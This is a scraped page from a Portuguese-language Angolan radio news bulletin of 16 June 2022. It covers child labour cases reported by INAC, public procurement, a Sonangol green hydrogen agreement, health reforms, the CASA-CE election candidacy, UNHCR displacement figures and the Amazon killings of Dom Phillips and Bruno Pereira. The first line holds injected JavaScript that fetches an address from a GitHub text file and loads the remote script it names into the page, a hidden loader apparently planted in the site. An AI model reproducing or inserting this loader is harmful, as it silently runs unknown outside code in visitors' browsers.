;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Edição de 16 de Junho de 2022 | RadioPlayDigital
Edição de 16 de Junho de 2022
 

País regista em dois anos, mais de dezassete mil e novecentos casos de trabalho infantil, segundo o INAC.

Contratos de obras públicas dominaram os procedimentos de contratação pública entre 2018 a 2021

CASA-CE apresenta candidatura as eleições de Agosto.

Três quartos dos novos deslocados internos estavam na África subsaariana, em 2021.

Ponto

Quinta-feira 16 de Junho, dia da criança africana. O Faustino Diogo edita as notícias, com técnica de Emanuel Catilina e Galacio Santana. Apresenta o Sílvio.

Ponto

Boa tarde,

O país registou nos últimos dois anos, mais de dezassete mil e novecentos casos de trabalho infantil, e muitos deles foram denunciados à Linha SOS criança, revelou a directora adjunta do INAC.

Elisa Gourgel que falava à Lac à propósito do Dia da Criança Africana que hoje se assinala, disse que os números da exploração infantil em Angola são alarmantes, e preocupam as autoridades.

RD5-ElGourgel 5

Elisa Gourgel alertou que muitos trabalhos realizados pelas crianças em Angola, comprometem o seu desenvolvimento.

RD-EGourgel 6

A directora adjunta do INAC revelou também que estão em curso alguns programas para o empoderamento das famílias mais vulneráveis, que começam com o registo ao nível dos municípios.

RD-EGourgel 4

Elisa Gourgel directora adjunta do Instituto Nacional da Criança sobre os maus tratos e instrumentalização de menores no país. 

Grande parte destes casos, chegam ao conhecimento público, por via de denúncias na Linha SOS criança que entrou em funcionamento há dois anos.

E hoje, um pai invisual, acompanhado do seu filho de 11 anos de idade, portador de albinismo, veio aos estúdios da LAC, pedir ajuda à sociedade, porque a criança está a perder a visão, e tem vários hematomas na cabeça, por falta de cremes e cuidados adequados.

RD-FNgola (invisual)

Filipe Ngola, invisual desempregado, pai de seis filhos, um destes portador de albinismo que veio hoje à Comercial pedir apoio à sociedade.

Ponto

O Serviço Nacional de Contratação Pública (SNCP) registou entre 2018 a 2021 mais de quatro mil procedimentos de contração públicas, com os contratos de obras públicas a dominarem estes procedimentos.

Os dados foram avançados esta manhã pela ministra das finanças na abertura do seminário que marca a sexta edição da semana de contratação pública.

No evento que decorre até amanhã em Luanda, em parceria com a Ordem dos engenheiros, Vera Daves de Sousa, destacou o peso das obras públicas, na contratação pública, que em quatro anos registou mais de mil e setecentos contratos.

RD VDSousa 1

A ministra das finanças avançou que tem sido combatida a corrupção na contratação pública.

RD – VDSousa 2

Ministra das finanças, Vera Daves de Sousa, hoje na abertura do seminário que marca a sexta edição da semana de contratação pública, evento que decorre até amanhã em Luanda, em parceria com a Ordem dos engenheiros

A Sonangol assinou um memorando de entendimento com as empresas alemãs Gauff e Conjucta para a produção de hidrogénio verde, a partir de 2024.

Segundo um comunicado de imprensa da Sonangol, o acordo surge na sequência de estudos de viabilidade técnica e económica, previamente efetuados, para o financiamento, construção e operação de uma fábrica de produção de hidrogénio verde e produtos derivados, em Angola.

O objetivo é comercializar o produto no mercado local e internacional, em países como a Alemanha, prevendo-se igualmente a criação de empregos.

A assinatura do acordo, ontem na Alemanha, foi testemunhada pelo ministro dos recursos minerais petróleo e gás, Diamantino Azevedo.

RD – DAzevedo 1

O ministro destacou o potencial do hidrogénio verde, que constitui uma das fontes energéticas mais limpas, assim com os ganhos para a economia.

RD – DAzevedo 2 

Diamantino Azevedo deixou recomendações a Sonangol e parceiros, no sentido de cumprimento o prazo estipulado para o arranque da produção

RD-DAzevedo 3 

Ministro dos Recursos Minerais Petróleo e Gás, Diamantino Azevedo.  

Publicidade

A ministra de Estado para a Área Social, defendeu a reforma e a aplicação de mais investimentos para o sistema nacional de saúde.

Carolina Cerqueira, falava hoje em Luanda, durante a abertura do Primeiro Fórum Dos Cuidados de Saúde Primários e Imunização, onde disse ser essencial aumentar a cobertura dos serviços para a redução da mortalidade e o combate as endemias.

RD-CCerqueira1

A ministra de Estado, disse ainda ser essencial a continuidade das reformas no sistema, para que haja maior responsabilidade e humanização.

RD-CCerqueira2

Ministra de Estado para a Área Social, Carolina Cerqueira

A titular da pasta da saúde, Silvia Lutucuta, reconheceu que o país tem ainda um longo caminho a percorrer para conseguir assegurar o acesso dos angolanos a serviços de qualidade.

RD-SLutucuta

Ministra da Saúde, Silvia Lutucuta, hoje em Luanda, durante a abertura do Primeiro Fórum Dos Cuidados de Saúde Primários e Imunização.

A CASA-CE foi a segunda força política a entregar a candidatura às eleições gerais de 24 de Agosto. O Acto aconteceu ontem a noite no Tribunal Constitucional.

Em declarações após entrega das 55 pastas que formalizam a candidatura da Convergência Ampla de Salvação de Angola-Coligação Eleitoral junto do Tribunal Constitucional, o vice-presidente e coordenador da campanha, Sikonda Alexandre, disse que este é um dos dias mais importantes para o movimento, que participa pela terceira vez num ato eleitoral.

O cabeça-de-lista é o economista e presidente da CASA-CE, Manuel Fernandes, enquanto o deputado André Mendes de Carvalho será o número dois.

A documentação, com mais de 20 mil assinaturas, foi entregue, ontem.

RD – CJacinto 

Carlos Jacinto da CASA-CE que ontem entregou a sua candidatura as eleições gerais de Agosto ao Tribunal Constitucional.

Ponto

Na política internacional,

Mais de três quartos de todos os novos deslocados internos em 2021 ocorreram na África subsaariana, com quase 4,1 milhões de casos na Etiópia, Somália, Sudão do Sul e Sudão, revela hoje um relatório da ONU.

Segundo o relatório “Tendências globais: Deslocamentos Forçados”, divulgado pelo Alto Comissariado das Nações Unidas para os Refugiados (ACNUR), o número de pessoas forçadas a deixar suas casas devido a guerras, violência e violações dos direitos humanos tem crescido todos os anos na última década e, no final de 2021, atingiu o recorde de 89,3 milhões.

Destes, 53,2 milhões estão deslocados nos seus próprios países, 27,1 milhões são refugiados e 4,6 milhões são requerentes de asilo

Pelo menos 40 pessoas foram mortas em confrontos na cidade etíope ocidental de Gambella, na sequência de confrontos na terça-feira, noticiou a BBC.

Dez dos mortos eram membros das forças de segurança do Governo etíope, indicou um responsável governamental citado pela emissora britânica.

As autoridades brasileiras encontraram restos humanos no local onde um dos principais suspeitos confessou ter assassinado o jornalista britânico Dom Phillips e o activista brasileiro Bruno Araújo Pereira numa zona remota da Amazónia.

As autoridades acreditam que os dois estão mortos, apesar de os corpos ainda terem de ser identificados, algo que vai acontecer em Brasília hoje.

Dom Phillips, jornalista e colaborador do jornal The Guardian, e Bruno Araújo Pereira, activista dos direitos indígenas, estão desaparecidos desde 5 de Junho, no Vale do Javari, região remota e de selva na Amazónia brasileira perto da fronteira com Peru e Colômbia, onde realizavam uma investigação sobre ameaças de invasores e criminosos contra os indígenas.

 

Data de Emissão: 16-06-2022 às 12:30
Género(s): Noticiário
 

Relacionados